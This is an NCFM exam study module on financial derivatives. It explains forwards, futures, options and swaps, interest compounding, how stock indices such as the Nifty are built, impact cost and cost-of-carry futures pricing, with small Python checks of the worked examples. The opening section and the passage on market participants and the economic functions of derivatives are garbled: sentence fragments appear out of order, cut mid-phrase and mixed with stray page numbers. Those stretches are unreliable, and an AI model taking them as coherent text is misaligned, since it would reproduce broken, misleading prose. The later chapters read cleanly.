Note: Candidates are advised to refer to NSE's website: www.nseindia.com while preparing for NCFM test(s) for announcements pertaining to revisions/updations in NCFM modules or launch of new modules, if any.
1 Forward Contracts: These are promises to deliver an asset at a pre. of underlying securities. 1. share. (ii) a contract which derives its value from the prices. These are basically exchange traded. The buyers of futures contracts are considered having a long position whereas the sellers are considered to be having a short position. an interest bearing security or a physical commodity. 1.2 Futures Contracts: A futures contract is an agreement between two parties to buy or sell an asset at a certain time in future at a certain price. temperature and even volatility.3 Options Contracts: Options give the buyer (holder) a right but not an obligation to buy or sell an asset in future.CHAPTER 1: Introduction to Derivatives The term ‘Derivative’ stands for a contract whose price is derived from or is dependent upon an underlying asset. It should be noted that this is similar to any asset market where anybody who buys is long and the one who sells in short. 1. (1956) the term “derivative” includes: (i) a security derived from a debt instrument. The contracts are traded over the counter (i. Forwards are highly popular on currencies and interest rates. Futures contracts are available on variety of commodities. the risk that one of the parties to the contract may not fulfill his or her obligation. directly between the two parties) and are customized according to the needs of the parties.e. The exchange stands guarantee to all transactions and counterparty risk is largely eliminated.1 Types of Derivative Contracts Derivatives comprise four basic contracts namely Forwards. standardized contracts. around the world. stock and market index. Options and Swaps. They are highly popular on stock indices.1.1. Calls give the buyer the right but not the obligation to buy a given quantity of the underlying asset. currencies. or index of prices. The underlying asset could be a financial asset such as currency. they generally suffer from counterparty risk i. Futures. weather. 
According to the Securities Contract Regulation Act, derivatives include a security derived from a debt instrument, share, loan (whether secured or unsecured), risk instrument or contract for differences, or any other form of security. Today, derivative contracts are traded on electricity, interest rates, foreign exchange, stocks and other tradable assets. Over the past couple of decades several exotic contracts have also emerged, but these are largely variants of the basic contracts. Let us briefly define some of these contracts.

Forwards: A forward contract is an agreement between two parties to buy or sell an asset on a predetermined date in the future at a predetermined price. Forward contracts are traded outside the stock exchanges and hence do not fall under the purview of the rules and regulations of an exchange.

Options: Options are of two types - calls and puts. Calls give the buyer the right, but not the obligation, to buy a given quantity of the underlying asset at a given price on or before a given future date. Puts give the buyer the right, but not the obligation, to sell a given quantity of the underlying asset at a given price on or before a given date.

It should be noted that in the first two types of derivative contracts (forwards and futures) both the parties (buyer and seller) have an obligation; i.e. the buyer needs to pay for the asset to the seller and the seller needs to deliver the asset to the buyer on the settlement date. In case of options only the seller (also called the option writer) is under an obligation and not the buyer (also called the option purchaser). The buyer has a right to buy (call options) or sell (put options) the asset from/to the seller of the option, but he may or may not exercise this right. In case the buyer of the option does exercise his right, the seller of the option must fulfill his obligation (for a call option the seller has to deliver the asset to the buyer of the option, and for a put option the seller has to receive the asset from the buyer of the option). An option can be exercised at the expiry of the contract period (which is known as a European option contract) or anytime up to the expiry of the contract period (termed as an American option contract). One can buy and sell each of the contracts. When one buys an option he is said to be having a long position, and when one sells he is said to be having a short position. We will discuss option contracts in detail in chapters 5 and 6.

1.1.4 Swaps: Swaps are private agreements between two parties to exchange cash flows in the future according to a prearranged formula. They can be regarded as portfolios of forward contracts. The two commonly used swaps are:
• Interest rate swaps: These entail swapping only the interest related cash flows between the parties in the same currency.
• Currency swaps: These entail swapping both principal and interest between the parties, with the cash flows in one direction being in a different currency than those in the opposite direction.

Box 1.1: Over the Counter (OTC) Derivative Contracts
Derivatives that trade on an exchange are called exchange traded derivatives, whereas privately negotiated derivative contracts are called OTC contracts. The OTC derivatives markets have the following features compared to exchange-traded derivatives:
(i) The management of counter-party (credit) risk is decentralized and located within individual institutions,
(ii) There are no formal centralized limits on individual positions, leverage, or margining,
(iii) There are no formal rules for risk and burden-sharing,
(iv) There are no formal rules or mechanisms for ensuring market stability and integrity, and for safeguarding the collective interests of market participants, and
(v) The OTC contracts are generally not regulated by a regulatory authority or the exchange's self-regulatory organization. They are, however, affected indirectly by national legal systems, banking supervision and market surveillance.
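The asymmetry between the option buyer's right and the seller's obligation is easiest to see in the expiry payoffs. The following Python sketch (not part of the original text; the strike of 100 is purely illustrative) computes the buyer's payoff for calls and puts:

```python
# Expiry payoffs from the option buyer's side. A call pays off when the
# spot ends above the strike, a put when it ends below; otherwise the
# buyer simply lets the option lapse. The seller's payoff is the mirror
# image of the buyer's.

def call_payoff(spot_at_expiry, strike):
    """Buyer of a call: right, but not obligation, to buy at the strike."""
    return max(spot_at_expiry - strike, 0)

def put_payoff(spot_at_expiry, strike):
    """Buyer of a put: right, but not obligation, to sell at the strike."""
    return max(strike - spot_at_expiry, 0)

print(call_payoff(110, 100))  # 10: the buyer exercises the call
print(call_payoff(90, 100))   # 0: the buyer lets the call lapse
print(put_payoff(90, 100))    # 10: the buyer exercises the put
```

Note that the buyer's payoff is never negative at expiry (ignoring the premium paid), which is exactly the "right but not obligation" feature described above.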
1.2 History of Financial Derivatives Markets

Financial derivatives have emerged as one of the biggest markets of the world during the past two decades. A rapid change in technology has increased the processing power of computers and has made them a key vehicle for information processing in financial markets. Globalization of financial markets has forced several countries to change their laws and introduce innovative financial contracts, which have made it easier for the participants to undertake derivatives transactions.

Early forward contracts in the US addressed merchants' concerns about ensuring that there were buyers and sellers for commodities. However, 'credit risk' remained a serious problem. To deal with this problem, a group of Chicago businessmen formed the Chicago Board of Trade (CBOT) in 1848. The primary intention of the CBOT was to provide a centralized location (which would be known in advance) for buyers and sellers to negotiate forward contracts. In 1865, the CBOT went one step further and listed the first 'exchange traded' derivatives contract in the US; these contracts were called 'futures contracts'. In 1919, the Chicago Butter and Egg Board, a spin-off of CBOT, was reorganized to allow futures trading. Its name was changed to Chicago Mercantile Exchange (CME). The CBOT and the CME remain the two largest organized futures exchanges, indeed the two largest 'financial' exchanges of any kind in the world today.

The first exchange-traded financial derivatives emerged in the 1970s due to the collapse of the fixed exchange rate system and the adoption of floating exchange rate systems. As the system broke down, currency volatility became a crucial problem for most countries. To help participants in foreign exchange markets hedge their risks under the new floating exchange rate system, foreign currency futures were introduced in 1972 at the Chicago Mercantile Exchange. In 1973, the Chicago Board of Trade (CBOT) created the Chicago Board Options Exchange (CBOE) to facilitate the trade of options on selected stocks. The first stock index futures contract was traded at the Kansas City Board of Trade. Currently the most popular stock index futures contract in the world is based on the S&P 500 index, traded on the Chicago Mercantile Exchange. During the mid-eighties, financial futures became the most active derivative instruments, generating volumes many times more than the commodity futures. Index futures, futures on T-bills and Euro-Dollar futures are the three most popular futures contracts traded today. Other popular international exchanges that trade derivatives are LIFFE in England, DTB in Germany, SGX in Singapore, TIFFE in Japan, MATIF in France, Eurex etc.
Futures contracts on interest-bearing government securities were introduced in the mid-1970s. Afterwards, a large number of innovative products have been introduced in both the exchange traded format and the Over the Counter (OTC) format. The OTC derivatives have grown faster than the exchange-traded contracts in recent years, both in terms of volume and turnover. Table 1.1 gives a bird's eye view of these contracts as available worldwide on several exchanges.

Box 1.2: History of Derivative Trading at NSE
The derivatives trading on the NSE commenced on June 12, 2000 with futures trading on the S&P CNX Nifty Index. Subsequent trading in index options and options on individual securities commenced on June 4, 2001 and July 2, 2001 respectively. Single stock futures were launched on November 9, 2001. Ever since, the product base has increased to include trading in futures and options on the CNX IT Index, Bank Nifty Index, Nifty Midcap 50 indices etc. Today, NSE is the largest derivatives exchange in India. The derivatives contracts have a maximum of 3-month expiration cycles, except for a long dated Nifty options contract which has a maturity of 5 years. Three contracts are available for trading, with 1-month, 2-month and 3-month expiries. A new contract is introduced on the next trading day following the expiry of the near month contract.
In this section. Margining. are linked to the underlying cash markets. With the introduction of derivatives. Thus derivatives help in discovery of future as well as current prices. • Prices in an organized derivatives market reflect the perception of the market participants about the future and lead the prices of underlying to the perceived future level.. due to their inherent nature. The prices of derivatives converge with the prices of the underlying at the expiration of the derivative contract. In the absence of an organized derivatives market. 10 . we discuss some of them. This is because of participation by more players who would not otherwise participate for lack of an arrangement to transfer risk. • Arbitrageurs: They take positions in financial markets to earn riskless profits. • Speculative trades shift to a more controlled environment in derivatives market. 1. Hedgers use the derivatives markets primarily for price risk management of assets and portfolios. the underlying market witnesses higher trading volumes. speculators trade in the underlying cash markets.4 Economic Function of the Derivative Market The derivatives market performs a number of economic functions. The arbitrageurs take short and long positions in the same or different contracts at the same time to create a position which can generate a riskless profit. Several new and innovative contracts have been launched over the past decade around the world including option contracts on volatility indices. • Derivatives. monitoring and surveillance of the activities of various participants become extremely difficult in these kind of mixed markets. • The derivatives market helps to transfer risks from those who have them but do not like them to those who have an appetite for them. 
1.3 Participants in a Derivative Market The derivatives market is similar to any other financial market and has following three broad categories of participants: • Hedgers: These are investors with a present or anticipated exposure to the underlying asset which is subject to price risks.The above list is not exhaustive.
well-educated people with an entrepreneurial attitude. creative. They often energize others to create new businesses. In a nut shell.• An important incidental benefit that flows from derivatives trading is that it acts as a catalyst for new entrepreneurial activity. derivatives markets help increase savings and investment in the long run. Transfer of risk enables market participants to expand their volume of activity. 11 . The derivatives have a history of attracting many bright. new products and new employment opportunities. the benefit of which are immense.
CHAPTER 2: Understanding Interest Rates and Stock Indices

In this chapter we will discuss interest rates and market index related issues, since this will help in better understanding the functioning of derivatives markets. We will also learn about derivative contracts on indices, which have the index as underlying.

2.1 Understanding Interest rates

Interest rates can be discrete or continuous. When people invest in financial markets (such as equity shares), returns on assets change continuously, which leads to the fact that continuous compounding should be used. On the other hand, a fixed deposit is discretely compounded, and the frequency could be anything from annual to quarterly to daily.

Interest rates are always quoted on a per annum basis. However, they also indicate the compounding frequency along with the per annum rates. For example, the statement that the interest rate on a given deposit is equal to 10% per annum implies that the deposit provides an interest rate of 10% on an annually compounded basis, using the formula A = P(1 + r/m)^(mt), where P is the principal, r the rate of interest, m the compounding frequency per year and t the time in years. For instance, if Rs 100 is deposited in a fixed deposit at 10% compounded annually, it would give a return of Rs 100(1 + 0.1) = Rs 110. However, the final amount will be different if the compounding frequency changes. If the compounding frequency is changed to semi-annual and the rate of interest on Rs 100 is 10%, then the amount on maturity would be Rs 100(1 + 0.1/2)^2 = Rs 110.25. Table 2.1 below shows the change in the amount when the same interest rate is compounded more frequently, i.e. from annual to daily and finally continuous compounding.

Table 2.1: Rs 100 invested at 10% per annum for one year
Compounding frequency | Amount in one year (Rs)
Annual                | 110.000
Semi-annual           | 110.250
Quarterly             | 110.381
Monthly               | 110.471
Daily                 | 110.516
Continuous            | 110.517

It should be noted that daily compounding is the new norm for calculating savings account balances by banks in India (starting from April 1, 2010). Continuous compounding is done by multiplying the principal with e^(rt), where r is the rate of interest, t the time period and e the exponential constant, which is equal to 2.718 (approximately).

Illustration 2.1
What is the equivalent rate for continuous compounding for an interest rate which is quoted:
(a) 8% per annum semi annual compounding?
(b) 8% per annum annual compounding?
Solution:
(a) 2 ln(1 + 0.08/2) = 0.078441 = 7.844%
(b) ln(1 + 0.08) = 0.076961 = 7.696%

Illustration 2.2
A bank quotes you an interest rate of 10% per annum with quarterly compounding. What is the equivalent rate when it is:
(a) Continuous compounding?
(b) Annual compounding?
Solution:
(a) 4 ln(1 + 0.10/4) = 0.098770 = 9.877%
(b) [(1 + 0.10/4)^4] - 1 = 0.1038 = 10.38%
Part (b) of Illustration 2.2 is also called the effective annual rate calculation. By this method any given interest rate or return can be converted to its effective annual interest rate or effective annual return.

2.2 Understanding the Stock Index

An index is a number which measures the change in a set of values over a period of time. A stock index represents the change in value of a set of stocks which constitute the index. More specifically, a stock index number is the current relative value of a weighted average of the prices of a pre-defined group of equities. It is calculated with reference to a base period and a base index value. The beginning value or base of the index is usually set to a number such as 100 or 1000. For example, the base value of the Nifty was set to 1000 on the start date of November 3, 1995. A stock market index is created by selecting a group of stocks that are representative of the entire market or a specified sector or segment of the market.

Stock market indices are meant to capture the overall behaviour of equity markets and are useful for a variety of reasons. Some uses of them are:
1. As a barometer for market behaviour,
2. As a benchmark for portfolio performance,
3. As an underlying in derivative instruments like index futures and index options, and
4. In passive fund management by index funds/ETFs.
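The rate conversions in Illustrations 2.1 and 2.2 can be verified programmatically. A small Python sketch (the function names are ours, not from the text):

```python
import math

def to_continuous(rate, m):
    """Continuously compounded rate equivalent to a per annum `rate`
    compounded m times a year: r_c = m * ln(1 + rate/m)."""
    return m * math.log(1 + rate / m)

def effective_annual(rate, m):
    """Effective annual rate for a per annum `rate` compounded m times
    a year: (1 + rate/m)**m - 1."""
    return (1 + rate / m) ** m - 1

# Illustration 2.1: 8% p.a. semi-annual and annual, to continuous
print(round(to_continuous(0.08, 2) * 100, 3))     # 7.844
print(round(to_continuous(0.08, 1) * 100, 3))     # 7.696
# Illustration 2.2: 10% p.a. quarterly, to continuous and effective annual
print(round(to_continuous(0.10, 4) * 100, 3))     # 9.877
print(round(effective_annual(0.10, 4) * 100, 2))  # 10.38
```

The same two functions also reproduce Table 2.1: for example, 100 * (1 + effective_annual(0.10, 4)) gives the quarterly-compounding row of about Rs 110.381.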
2.3 Economic Significance of Index Movements

Index movements reflect the changing expectations of the stock market about future dividends of the corporate sector. The index goes up if the stock market perceives that the prospective dividends in the future will be better than previously thought. When the prospects of dividends in the future become pessimistic, the index drops. The ideal index gives us an instant picture of how the stock market perceives the future of the corporate sector.

Every stock price moves for two possible reasons:
1. News about the company - micro economic factors (e.g. a product launch, the closure of a factory, or other factors specific to the company)
2. News about the economy - macro economic factors (e.g. budget announcements, changes in tax structure and rates, political news such as a change of national government, or other factors common to all companies in a country)

The index captures the second part, the movements of the stock market as a whole (i.e. news about the macroeconomic factors related to the entire economy). This is achieved by averaging. Each stock contains a mixture of two elements - stock news and index news. When we take an average of returns on many stocks, the individual stock news tends to cancel out and the only thing left is news that is common to all stocks, i.e. news about the economy.

2.4 Index Construction Issues

A good index is a trade-off between diversification and liquidity. A well diversified index is more representative of the market/economy. There are, however, diminishing returns to diversification. Going from 10 stocks to 20 stocks gives a sharp reduction in risk. Going from 50 stocks to 100 stocks gives very little reduction in risk. Going beyond 100 stocks gives almost zero reduction in risk. Hence, there is little to gain by diversifying beyond a point. The more serious problem lies in the stocks which are included into an index when it is broadened. If a stock is illiquid, the observed prices yield contaminated information and actually worsen the index.

The correct method of averaging is that of taking a weighted average, giving each stock a weight proportional to its market capitalization. Example: Suppose an index contains two stocks, A and B. A has a market capitalization of Rs. 1000 crore and B has a market capitalization of Rs. 3000 crore. Then we attach a weight of 1/4 to movements in A and 3/4 to movements in B.

The computational methodologies followed for the construction of stock market indices are (a) Free Float Market Capitalization Weighted Index, (b) Market Capitalization Weighted Index and (c) Price Weighted Index.

Free Float Market Capitalisation Weighted Index: The free float factor (Investible Weight Factor), for each company in the index, is determined based on the public shareholding of the companies as disclosed in the shareholding pattern submitted to the stock exchange by these companies(1). The free float market capitalization is calculated in the following manner:

Free Float Market Capitalisation = Issue Size * Price * Investible Weight Factor

The index in this case is calculated as per the formula given below:

Index = (Free float current market capitalisation / Free float base market capitalisation) * Base index value

The India Index Services Limited (IISL), a joint venture between the NSE and CRISIL, introduced the free float market capitalization methodology for its main four indices, viz., S&P CNX Nifty, CNX Nifty Junior, CNX 100 and S&P CNX Defty. With effect from May 4, 2009 CNX Nifty Junior and CNX 100, and with effect from June 26, 2009 S&P CNX Nifty and S&P CNX Defty, are being calculated using free float market capitalisation.

Market Capitalisation Weighted Index: In this type of index calculation, each stock in the index affects the index value in proportion to the market value of all shares outstanding. In this case the index would be calculated as per the formula below:

Index = (Current market capitalisation / Base market capitalisation) * Base index value

where:
Current market capitalization = Sum of (current market price * issue size) of all securities in the index.
Base market capitalization = Sum of (market price * issue size) of all securities as on the base date.

Price Weighted Index: In a price weighted index each stock influences the index in proportion to its price per share. The value of the index is generated by adding the prices of each of the stocks in the index and dividing them by the total number of stocks. Stocks with a higher price will be given more weight and will, therefore, have a greater influence over the performance of the index.

2.5 Desirable Attributes of an Index

A good market index should have three attributes:
• It should capture the behaviour of a large variety of different portfolios in the market.
• The stocks included in the index should be highly liquid.
• It should be professionally maintained.

(1) The free float method excludes: (i) Government holding in the capacity of strategic investor, (ii) Shares held by promoters through ADRs/GDRs, (iii) Strategic stakes by corporate bodies/individuals/HUF, (iv) Investments under FDI category, and (v) Equity held by associate/group companies.
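The free float index formula above can be illustrated with a toy calculation. In this Python sketch the two stocks, their issue sizes, prices and investible weight factors are invented for illustration only:

```python
# Toy free float market capitalisation weighted index, following the
# formula in the text: Index = (free float current market cap /
# free float base market cap) * base index value.

BASE_INDEX_VALUE = 1000

def free_float_mcap(stocks):
    """Sum of issue size * price * investible weight factor (IWF)."""
    return sum(s["issue_size"] * s["price"] * s["iwf"] for s in stocks)

def index_value(current_stocks, base_stocks):
    return (free_float_mcap(current_stocks)
            / free_float_mcap(base_stocks) * BASE_INDEX_VALUE)

base = [
    {"issue_size": 1000, "price": 100, "iwf": 0.6},
    {"issue_size": 500,  "price": 200, "iwf": 0.8},
]
# Every price rises 10% from the base date; issue sizes and IWFs are
# unchanged, so the index should read 10% above its base value.
current = [dict(s, price=s["price"] * 1.1) for s in base]
print(round(index_value(current, base), 2))  # 1100.0
```

Because the IWF scales down each company's market capitalisation to its public float, a promoter-heavy company moves the index less than its full market capitalisation would suggest.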
In brief, the level of diversification of a stock index should be monitored on a continuous basis. It should ensure that the index is not vulnerable to speculation. The index should be managed smoothly, without any dramatic changes in its composition. Stocks with low trading volume or with very wide bid-ask spreads are illiquid and should not be a part of the index.

2.5.1 Impact cost
Market impact cost is a measure of the liquidity of the market. It reflects the costs faced when actually trading an index. Suppose a stock trades at bid 99 and ask 101. We say the "ideal" price is Rs. 100. Now, suppose a buy order for 1000 shares goes through at Rs. 102. Then we say the market impact cost at 1000 shares is 2%. If a buy order for 2000 shares goes through at Rs. 104, we say the market impact cost at 2000 shares is 4%. For a stock to qualify for possible inclusion into the S&P CNX Nifty, it has to have a market impact cost of below 0.50% when doing S&P CNX Nifty trades of two crore rupees. This means that if S&P CNX Nifty is at 2000, a buy order goes through at about 2001, i.e. 2000 + (2000*0.0005), and a sell order gets about 1999, i.e. 2000 - (2000*0.0005).

Box 2.1: The S&P CNX Nifty
The S&P CNX Nifty is a float-adjusted market capitalization weighted index derived from economic research. It was designed not only as a barometer of market movement but also to be a foundation of the new world of financial products based on the index, like index futures, index options and index funds. A trillion calculations were expended to evolve the rules inside the S&P CNX Nifty index. The results of this work are remarkably simple: (a) the correct size to use is 50, (b) stocks considered for the S&P CNX Nifty must be liquid by the 'impact cost' criterion, and (c) the largest 50 stocks that meet the criterion go into the index.

The S&P CNX Nifty covers 21 sectors of the Indian economy and offers investment managers exposure to the Indian market in one efficient portfolio. It is used for a variety of purposes, such as benchmarking fund portfolios, index based derivatives and index funds. The Nifty is uniquely equipped as an index for the index derivatives market owing to its (a) low market impact cost and (b) high hedging effectiveness. The good diversification of Nifty generates a low initial margin requirement. The research that led up to the S&P CNX Nifty is well-respected internationally as a pioneering effort in better understanding how to make a stock market index.
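The impact cost calculation described above can be expressed as a short function. A Python sketch reproducing the text's bid 99 / ask 101 example:

```python
# Market impact cost as defined in the text: the ideal price is the
# mid-point of the best bid and ask, and the impact cost is the
# percentage deviation of the actual execution price from that ideal.

def impact_cost(bid, ask, execution_price):
    ideal = (bid + ask) / 2
    return abs(execution_price - ideal) * 100 / ideal

# The text's example: bid 99, ask 101, so the ideal price is Rs. 100.
print(impact_cost(99, 101, 102))  # 2.0 -> the 1000-share buy at Rs. 102
print(impact_cost(99, 101, 104))  # 4.0 -> the 2000-share buy at Rs. 104
```

Note that the impact cost depends on the order size: the larger order above walks further up the order book and therefore pays a higher percentage cost, which is exactly why it is used as a liquidity criterion for index inclusion.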
2.6 Applications of Index

Besides serving as a barometer of the economy/market, the index also has other applications in finance. Various products have been designed based on indices, such as index derivatives, index funds(2) and exchange traded funds(3). We here restrict our discussion to only index derivatives.

2.6.1 Index derivatives
Index derivatives are derivative contracts which have the index as the underlying. The most popular index derivative contracts the world over are index futures and index options. NSE's market index, the S&P CNX Nifty, was scientifically designed to enable the launch of index-based products like index derivatives and index funds. Following are the reasons for the popularity of index derivatives:
• Institutional and large equity-holders need a portfolio-hedging facility. Index derivatives are more suited to them and more cost-effective than derivatives based on individual stocks. Pension funds in the US are known to use stock index futures for risk hedging purposes.
• Index derivatives offer ease of use for hedging any portfolio irrespective of its composition.
• A stock index is difficult to manipulate as compared to individual stock prices, more so in India. This is partly because an individual stock has a limited supply, which can be cornered; with an index, the possibility of cornering is reduced.
• A stock index, being an average, is much less volatile than individual stock prices. This implies much lower capital adequacy and margin requirements.
• Index derivatives are cash settled, and hence do not suffer from settlement delays and problems related to bad delivery and forged/fake certificates.

(2) An index fund is a fund that tries to replicate the index returns. It does so by investing in index stocks in the proportions in which these stocks exist in the index.
(3) ETFs are just what their name implies: baskets of securities that are traded, like individual stocks, on an exchange. Unlike regular open-end mutual funds, ETFs can be bought and sold throughout the trading day like any stock.
CHAPTER 3: Futures Contracts, Mechanism and Pricing

In recent years, derivatives have become increasingly important in the field of finance. While futures and options are now actively traded on many exchanges, forward contracts are popular on the OTC market. We shall first discuss forward contracts along with their advantages and limitations. We then introduce futures contracts and describe how they are different from forward contracts. The terminology of futures contracts along with their trading mechanism is discussed next. The key idea of this chapter, however, is the pricing of futures contracts. The concept of cost of carry for calculation of the forward price has been a very powerful concept. One would realize that it essentially works as a parity condition, and any violation of this principle can lead to arbitrage opportunities. The chapter explains the mechanism and pricing of both index futures and futures contracts on individual stocks.

3.1 Forward Contracts

A forward contract is an agreement to buy or sell an asset on a specified date for a specified price. One of the parties to the contract assumes a long position and agrees to buy the underlying asset on a certain specified future date for a certain specified price. The other party assumes a short position and agrees to sell the asset on the same date for the same price. Other contract details like delivery date, price and quantity are negotiated bilaterally by the parties to the contract. The forward contracts are normally traded outside the exchanges.

The salient features of forward contracts are as given below:
• They are bilateral contracts and hence exposed to counter-party risk.
• Each contract is custom designed, and hence is unique in terms of contract size, expiration date and the asset type and quality.
• The contract price is generally not available in the public domain.
• On the expiration date, the contract has to be settled by delivery of the asset.
• If the party wishes to reverse the contract, it has to compulsorily go to the same counter-party, which often results in high prices being charged.
3.2 Limitations of forward markets

Forward markets world-wide are posed by several problems:
• Lack of centralization of trading,
• Illiquidity, and
• Counterparty risk
In the first two of these, the basic problem is that of too much flexibility and generality. The forward market is like a real estate market, in which any two consenting adults can form contracts against each other. This often makes them design the terms of the deal which are convenient in that specific situation, but makes the contracts non-tradable. Counterparty risk arises from the possibility of default by any one party to the transaction. When one of the two sides to the transaction declares bankruptcy, the other suffers. Even when forward markets trade standardized contracts, which avoids the problem of illiquidity, the counterparty risk still remains a very serious issue.

3.3 Introduction to Futures

A futures contract is an agreement between two parties to buy or sell an asset at a certain time in the future at a certain price. But unlike forward contracts, the futures contracts are standardized and exchange traded. To facilitate liquidity in the futures contracts, the exchange specifies certain standard features of the contract. It is a standardized contract with a standard underlying instrument, a standard quantity and quality of the underlying instrument that can be delivered (or which can be used for reference purposes in settlement), and a standard timing of such settlement. A futures contract may be offset prior to maturity by entering into an equal and opposite transaction.

3.4 Distinction between Futures and Forwards Contracts

Forward contracts are often confused with futures contracts. The confusion is primarily because both serve essentially the same economic functions of allocating risk in the presence of future price uncertainty. However, futures are a significant improvement over the forward contracts as they eliminate counterparty risk and offer more liquidity. Table 3.1 lists the distinctions between the forwards and futures contracts.
3.5 Futures Terminology

• Spot price: The price at which an underlying asset trades in the spot market.
• Futures price: The price that is agreed upon at the time of the contract for the delivery of an asset at a specific future date.
• Contract cycle: The period over which a contract trades. The index futures contracts on the NSE have one-month, two-month and three-month expiry cycles which expire on the last Thursday of the month. Thus a January expiration contract expires on the last Thursday of January and a February expiration contract ceases trading on the last Thursday of February. On the Friday following the last Thursday, a new contract having a three-month expiry is introduced for trading.
• Expiry date: The date on which the final settlement of the contract takes place.
• Contract size: The amount of asset that has to be delivered under one contract. This is also called the lot size.
• Basis: Basis is defined as the futures price minus the spot price. There will be a different basis for each delivery month for each contract. In a normal market, basis will be positive. This reflects that futures prices normally exceed spot prices.
• Cost of carry: Measures the storage cost plus the interest that is paid to finance the asset, less the income earned on the asset.
• Initial margin: The amount that must be deposited in the margin account at the time a futures contract is first entered into is known as initial margin.
• Marking-to-market: In the futures market, at the end of each trading day, the margin account is adjusted to reflect the investor's gain or loss depending upon the futures closing price. This is called marking-to-market.
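The marking-to-market mechanism described above can be sketched in code. In this Python sketch the lot size, margin levels and closing prices are illustrative assumptions, not NSE parameters:

```python
# Simplified daily marking-to-market for one long futures contract.
# Each day the margin account is adjusted by the change in the closing
# price times the lot size; when the balance falls below the
# maintenance margin, a margin call restores it to the initial margin.

LOT_SIZE = 50
INITIAL_MARGIN = 20000
MAINTENANCE_MARGIN = 15000

def mark_to_market(entry_price, closing_prices):
    balance = INITIAL_MARGIN
    total_margin_calls = 0
    prev = entry_price
    for close in closing_prices:
        balance += (close - prev) * LOT_SIZE   # daily gain or loss
        prev = close
        if balance < MAINTENANCE_MARGIN:       # margin call: top up
            total_margin_calls += INITIAL_MARGIN - balance
            balance = INITIAL_MARGIN
    return balance, total_margin_calls

# Long at 2220; the fall to 2100 triggers one margin call of Rs. 6000.
print(mark_to_market(2220, [2210, 2100, 2130]))  # (21500, 6000)
```

The sketch shows why the exchange faces very little credit risk: losses are collected daily, and a position is never allowed to run with less than the maintenance margin behind it.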
• Maintenance margin: Investors are required to place margins with their trading members before they are allowed to trade. If the balance in the margin account falls below the maintenance margin, the investor receives a margin call and is expected to top up the margin account to the initial margin level before trading commences on the next day.

3.6 Trading Underlying vs. Trading Single Stock Futures

The single stock futures market in India has been a great success story. One of the reasons for the success has been the ease of trading and settling these contracts.

To trade securities, one must open a security trading account with a securities broker and a demat account with a securities depository. Buying a security involves putting up all the money upfront. With the purchase of shares of a company, the holder becomes a part owner of the company. The shareholder typically receives the rights and privileges associated with the security, which may include the receipt of dividends, invitation to the annual shareholders meeting and the power to vote. Selling securities involves buying the security before selling it. Even in cases where short selling is permitted, it is assumed that the securities broker owns the security and then "lends" it to the trader so that he can sell it.

To trade in futures, one must open a futures trading account with a derivatives broker. Buying futures simply involves putting in the margin money. They enable the futures traders to take a position in the underlying security without having to open an account with a securities broker. With the purchase of futures on a security, the holder essentially makes a legally binding promise or obligation to buy the underlying security at some point in the future (the expiration date of the contract). Security futures do not represent ownership in a corporation, and the holder is therefore not regarded as a shareholder.

3.7 Futures Payoffs

Futures contracts have linear or symmetrical payoffs. This implies that the losses as well as profits for the buyer and the seller of a futures contract are unlimited. These linear payoffs are fascinating as they can be combined with options and the underlying to generate various complex payoffs.

3.7.1 Payoff for buyer of futures: Long futures
The payoff for a person who buys a futures contract is similar to the payoff for a person who holds an asset. He has a potentially unlimited upside as well as a potentially unlimited downside. Take the case of a speculator who buys a two-month Nifty index futures contract when the Nifty stands at 2220. The underlying asset in this case is the Nifty portfolio. When the index moves up, the long futures position starts making profits, and when the index moves down it starts making losses.
Figure 3.1: Payoff for a buyer of Nifty futures
The figure 3.1 above shows the profits/losses for a long futures position. The investor bought futures when the index was at 2220. If the index goes up, his futures position starts making profit. If the index falls, his futures position starts showing losses.

3.7.2 Payoff for seller of futures: Short futures
The payoff for a person who sells a futures contract is similar to the payoff for a person who shorts an asset. He has a potentially unlimited upside as well as a potentially unlimited downside. Take the case of a speculator who sells a two-month Nifty index futures contract when the Nifty stands at 2220. The underlying asset in this case is the Nifty portfolio. When the index moves down, the short futures position starts making profits, and when the index moves up, it starts making losses.

Figure 3.2: Payoff for a seller of Nifty futures
The figure 3.2 above shows the profits/losses for a short futures position. The investor sold futures when the index was at 2220. If the index goes down, his futures position starts making profit. If the index rises, his futures position starts showing losses.
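The linear payoffs described above can be expressed as a one-line function. A Python sketch using the text's entry level of 2220, with profit measured in index points (the contract multiplier is ignored here for simplicity):

```python
# Linear futures payoff: the long gains one point for every point the
# settlement ends above the entry, and the short position's payoff is
# the exact mirror image - hence the symmetric, unlimited profit and
# loss on both sides.

def futures_payoff(entry, settlement, position="long"):
    pnl = settlement - entry
    return pnl if position == "long" else -pnl

# Entry at 2220, as in the text's speculator examples.
print(futures_payoff(2220, 2280, "long"))   # 60: index rose, long gains
print(futures_payoff(2220, 2280, "short"))  # -60: the short loses the same
print(futures_payoff(2220, 2160, "short"))  # 60: index fell, short gains
```

For any settlement level, the long and short payoffs sum to zero, which is the symmetry the figures illustrate.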
3.8 Pricing Futures

Pricing of a futures contract is very simple. Using the cost-of-carry logic, we calculate the fair value of a futures contract. Every time the observed price deviates from the fair value, arbitragers would enter into trades to capture the arbitrage profit. This in turn would push the futures price back to its fair value. The cost of carry model used for pricing futures is given below:

F = S * e^(rT)

where:
F    Futures price
S    Spot price
r    Cost of financing (using a continuously compounded interest rate)
T    Time till expiration in years
e    2.71828

Example: Security XYZ Ltd trades in the spot market at Rs. 1150. Money can be invested at 11% p.a. The fair value of a one-month futures contract on XYZ is calculated as follows:

F = 1150 * e^(0.11 * 1/12) = Rs. 1160.59 (approximately)

3.8.1 Pricing equity index futures
A futures contract on the stock market index gives its owner the right and obligation to buy or sell the portfolio of stocks characterized by the index. Stock index futures are cash settled; there is no delivery of the underlying stocks. In their short history of trading, index futures have had a great impact on the world's securities markets. Their existence has revolutionized the art and science of institutional equity portfolio management.

The main differences between commodity and equity index futures are that:
• There are no costs of storage involved in holding equity.
• Equity comes with a dividend stream, which is a negative cost if you are long the stock and a positive cost if you are short the stock.

Therefore, Cost of carry = Financing cost - Dividends. Thus, a crucial aspect of dealing with equity futures as opposed to commodity futures is an accurate forecasting of dividends. The better the forecast of dividends offered by a security, the better is the estimate of the futures price.
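The cost-of-carry formula and the XYZ example above can be checked with a short Python sketch:

```python
import math

# Cost-of-carry fair value F = S * e^(r*T), applied to the example in
# the text: XYZ at Rs. 1150 spot, financing at 11% p.a., one month
# (1/12 of a year) to expiration.

def futures_fair_value(spot, r, t_years):
    return spot * math.exp(r * t_years)

print(round(futures_fair_value(1150, 0.11, 1 / 12), 2))  # 1160.59
```

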